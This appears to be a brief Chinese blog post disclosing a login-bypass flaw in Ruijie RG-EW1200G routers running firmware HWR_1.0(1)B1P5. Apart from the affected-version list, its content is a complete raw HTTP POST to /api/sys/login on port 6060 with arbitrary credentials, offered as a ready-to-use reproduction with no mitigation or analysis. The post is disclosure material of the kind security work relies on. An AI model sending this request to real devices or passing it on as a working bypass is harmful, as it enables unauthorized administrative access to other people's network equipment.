锐捷RG-EW1200G 登录绕过

最新推荐文章于 2024-10-05 21:05:32 发布

qq_36334672

最新推荐文章于 2024-10-05 21:05:32 发布

阅读量239

点赞数 1

文章标签： web安全安全

本文链接：https://blog.csdn.net/qq_36334672/article/details/135975825

版权

文章报道了RG-EW1200G路由器的HWR_1.0固件存在安全漏洞，涉及6060端口的POST/api/sys/login请求，详细描述了漏洞的复现方法，警示用户注意网络安全问题。

摘要由CSDN通过智能技术生成

影响版本

受影响产品：RG-EW1200G无线路由器
受影响固件：HWR_1.0(1)B1P5,Release(07161417) r483

复现

现只见过6060的端口的

POST /api/sys/login HTTP/1.1
Host: xxx.xxx.xxx:6060
Content-Length: 59
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: application/x-www-form-urlencoded
Origin: http://xxx.xxx.xxx:6060
Referer: http://xxx.xxx.xxx:6060/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

{"username":"2","password":"123","timestamp":1692412880000}